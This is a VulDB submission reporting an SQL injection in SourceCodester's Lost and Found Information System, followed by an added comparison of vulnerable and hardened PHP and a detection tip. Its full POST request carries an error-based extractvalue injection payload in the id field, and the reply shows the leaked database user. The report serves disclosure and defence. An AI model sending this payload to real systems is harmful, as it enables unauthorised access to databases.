Submission #182669: SourceCodester Lost and Found Information System sql injection (Info)

Title: SourceCodester Lost and Found Information System sql injection
Description: I found a SQL injection vulnerability in the SourceCodester Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html). This affects the file /classes/Master.php?f=save_inquiry:

POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------291530209222137902962820473916
Content-Length: 1093
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lfis/admin/?page=items/manage_item
Cookie: PHPSESSID=0mct2fkncfd5or5crbqj5o62he
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="id"

1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="category_id"

2
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="fullname"

1111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="title"

111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="contact"

111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="description"

1111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="status"

0
-----------------------------291530209222137902962820473916--

And it returns:

{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `category_id`='2' , `fullname`='1111' , `title`='111' , `contact`='111' , `description`='1111' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}

The appearance of '~admin@localhost~' proves that our code select user() was successfully executed, and there is an SQL error injection vulnerability here. The vulnerability arises from the usage of the code "UPDATE `inquiry_list` set {data} where id = '{id}' ;" without implementing sufficient filtering on the controllable parameter id. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
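The UPDATE construction the report describes, shown as the vulnerable string-built query beside a hardened version. This is an added example in PHP, not code from the project or the submitter; the function names, the $post array, the column list taken from the reported UPDATE statement, and the use of a prepared statement (a stronger alternative to the escaping the report recommends) are all assumptions.

```php
<?php
// Added example, not the project's code: the save_inquiry UPDATE from the
// report, first with id pasted into the SQL text, then with every
// user-controlled value bound as a parameter.
// Assumes a live mysqli connection and the columns named in the report.

// Vulnerable: id is interpolated into the SQL string, so a quote in it ends
// the literal and the rest of the value is parsed as SQL. Because the handler
// returns $conn->error to the client, a database error also leaks its text.
function save_inquiry_vulnerable(mysqli $conn, array $post): bool
{
    $data = [];
    foreach (['category_id', 'fullname', 'title', 'contact', 'description', 'status'] as $col) {
        $data[] = "`$col`='" . $post[$col] . "'";
    }
    $id  = $post['id'];
    $sql = "UPDATE `inquiry_list` set " . implode(' , ', $data) . " where id = '{$id}' ;";
    return $conn->query($sql) === true;
}

// Hardened: reject a non-integer id up front, then bind every value through a
// prepared statement so it is only ever compared as data, never parsed as SQL.
function save_inquiry_hardened(mysqli $conn, array $post): bool
{
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false) {
        return false;   // log and reject; never send $conn->error back to the client
    }
    $stmt = $conn->prepare(
        'UPDATE `inquiry_list` SET `category_id` = ?, `fullname` = ?, `title` = ?, '
        . '`contact` = ?, `description` = ?, `status` = ? WHERE `id` = ?'
    );
    if ($stmt === false) {
        return false;
    }
    $categoryId  = (int) ($post['category_id'] ?? 0);
    $status      = (int) ($post['status'] ?? 0);
    $fullname    = (string) ($post['fullname'] ?? '');
    $title       = (string) ($post['title'] ?? '');
    $contact     = (string) ($post['contact'] ?? '');
    $description = (string) ($post['description'] ?? '');
    // Type string: i = integer, s = string, one character per placeholder.
    $stmt->bind_param('issssii', $categoryId, $fullname, $title, $contact, $description, $status, $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

For detection, an "XPATH syntax error" string in the application's JSON responses or error logs is the signature of this error-based technique and is worth alerting on.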
Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User: Tritium (UID 50779)
Submitted: 14/07/2023 12:39 (3 years ago)
Moderated: 15/07/2023 09:33 (21 hours later)
Status: accepted
VulDB Entry: 234224 [SourceCodester Lost and Found Information System 1.0 HTTP POST Request Master.php?f=save_inquiry ID sql injection]
Points: 20
